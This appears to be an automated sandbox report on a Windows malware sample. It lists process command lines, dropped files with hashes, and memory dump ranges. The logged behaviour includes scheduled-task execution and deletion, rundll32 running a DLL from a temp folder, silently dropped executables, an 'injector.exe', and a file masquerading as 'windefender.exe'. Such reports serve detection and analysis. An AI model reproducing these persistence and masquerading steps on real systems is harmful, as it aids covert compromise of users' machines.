C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QhciBzJOokLnyYZub"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ofqvFcNvzeRditbz\vnZdJwDB\qxswCCh.dll",#1 /Fosite_idXfG 385118
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "BAnwxolbGpCzXNxkj"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QhciBzJOokLnyYZub"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe
"C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
C:\Windows\SYSTEM32\msiexec.exe
"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
Network
Files
C:\Users\Admin\Pictures\IxskVchc2rUcLuGjAA6X3uRx.exe
C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe
C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe
C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_enkhxx5j.h4u.ps1
C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe
C:\Windows\System32\GroupPolicy\gpt.ini
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe
C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe
C:\Users\Admin\AppData\Local\Temp\Opera_installer_240419140451252724.dll
C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\opera_package
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\additional_file0.tmp
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbghelp.dll
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\dbgcore.dll
| MD5 | 9ebb919b96f6f94e1be4cdc6913ef629 |
| SHA1 | 31e99ac4fba516f82b36bd81784e8d518b32f9df |
| SHA256 | fdae21127deb16eb8ba36f2493d2255f4cb8ab4c18e8bd8ba5e587f5a7ecd119 |
| SHA512 | a1b42f7d2896da270bb3c80cf9b88c4b4f1491084e7aa7760eeea5533b26f041dc79b21d5ffd2bba2221fe118e0a8d912e170f24fd895c9315b1ee9c7adfe700 |
C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe
| MD5 | 397926927bca55be4a77839b1c44de6e |
| SHA1 | e10f3434ef3021c399dbba047832f02b3c898dbd |
| SHA256 | 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7 |
| SHA512 | cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954 |
memory/3076-649-0x0000000000400000-0x0000000001A40000-memory.dmp
memory/2172-674-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1424-676-0x0000000000400000-0x00000000008AD000-memory.dmp
C:\Windows\windefender.exe
| MD5 | 8e67f58837092385dcf01e8a2b4f5783 |
| SHA1 | 012c49cfd8c5d06795a6f67ea2baf2a082cf8625 |
| SHA256 | 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa |
| SHA512 | 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec |
memory/1072-686-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2172-698-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1424-701-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/2172-742-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/1460-743-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2172-750-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/244-758-0x0000000010000000-0x0000000013BC3000-memory.dmp
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
| MD5 | cdfd60e717a44c2349b553e011958b85 |
| SHA1 | 431136102a6fb52a00e416964d4c27089155f73b |
| SHA256 | 0ee08da4da3e4133e1809099fc646468e7156644c9a772f704b80e338015211f |
| SHA512 | dfea0d0b3779059e64088ea9a13cd6b076d76c64db99fa82e6612386cae5cda94a790318207470045ef51f0a410b400726ba28cb6ecb6972f081c532e558d6a8 |
memory/1460-784-0x0000000000400000-0x00000000008DF000-memory.dmp
memory/2172-783-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c9e74ed00e926c59becad69a5caa346a |
| SHA1 | de60ae4e1749a56690f1d774ccb4ab725005a3c4 |
| SHA256 | 7dbdeb170717f76e81ab1142469c05994e25c9a17bc21b503e9d6484a70210e2 |
| SHA512 | 5c74c472f5d356a6c83f4656362034a11f02f57dc27ac14aab914e0567495ffb0d45b5f348734e9ab9c1f5c9374a39f99111312bb29b4a55394e8aaf13f32b80 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
| MD5 | 8679b2ab6610d033f5c98beb5063989a |
| SHA1 | 44dbd2010f4821d0134fbafb57ee9465d12150f3 |
| SHA256 | b56bf1ef6e30f1f0e7109627e8859a8270e7c2d290b0d5183d083c7ed0c083a8 |
| SHA512 | f3c4200896b69c1dc9c4db2e5bab7a4bddc9c253eee7aa4e63b8f6b337a6a5e9feaf03cb86455230e91509ddb29a6b78d1f7139111690e9b1b3ef0a3c246bea6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
| MD5 | 238d2612f510ea51d0d3eaa09e7136b1 |
| SHA1 | 0953540c6c2fd928dd03b38c43f6e8541e1a0328 |
| SHA256 | 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e |
| SHA512 | 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
| MD5 | 0b1cf3deab325f8987f2ee31c6afc8ea |
| SHA1 | 6a51537cef82143d3d768759b21598542d683904 |
| SHA256 | 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf |
| SHA512 | 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
| MD5 | 2a1e12a4811892d95962998e184399d8 |
| SHA1 | 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720 |
| SHA256 | 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb |
| SHA512 | bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
| MD5 | bd6b60b18aee6aaeb83b35c68fb48d88 |
| SHA1 | 9b977a5fbf606d1104894e025e51ac28b56137c3 |
| SHA256 | b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55 |
| SHA512 | 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | ef6984033cbe2419e353faffb46dc4cc |
| SHA1 | 0e938ec38d1780bb65af4fb846af4c5246ec656b |
| SHA256 | 8ce3d7b37e0253f2299825378a133f8c5c98d41e34523eae48fb84aaf2d2c134 |
| SHA512 | c80c500d4c49b5cc34510843f9b709c6eced8f5a9cc98d95c7be0146889c0d2fe6231302a72b0f3445f512973aa30c11d61477ae1303cc2cd5f3f4f629dc7f90 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ta9v328x.default-release\prefs.js
| MD5 | 21d1dbcbff005cc27d3ee4c8b5d40e15 |
| SHA1 | 4ba78901a2cc94f8e41e3f4ed908eff46751baf6 |
| SHA256 | 65f3e18ba77d36a9dc6a26a7085fa68d2a5afeafe6a400dee5f6aecb06f5fcf5 |
| SHA512 | 14dbaeb2bc4a14751c79203988f7897fccfb9a8261bb5908ec7a231a9b49a5a5612a2e3b6e52d4755299941018466c8f3020c6b7669d3aa362f177c87a0270e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | db3aec3ef659a65b6676644336d0f8c4 |
| SHA1 | 83c05ee25a84c6ff136694f19b4bbd0ee34bd997 |
| SHA256 | 4231e2fd0fcad36fda58f669884b508bdb308a45becc9821c181f3a18aed48de |
| SHA512 | 73802b69af66d2c4ebd2cf401e7ff17f2d632307ea7253bf5b8a673c8e90c254abb01ad739a14b2a5cc8e9358e6beae59abc92c127bd2447a24eed43a6ba19af |
C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe
| MD5 | 31fdaf5dfa78088a896093d9ff996ee0 |
| SHA1 | ae94f8a18af6de6be9ef3cba0e77d541b6455a00 |
| SHA256 | 657aaac97ab7af616faa4836e62b708448e44f157ff5fa221d8ef6d889930789 |
| SHA512 | 5afc90626d59d1639fe9b014cccaf8d88fbdbdb4be64add8c35fd14f993b8571cae343c7fda4d535c0968ab790530db9df18a1b229fb17b7d793531a3c42d006 |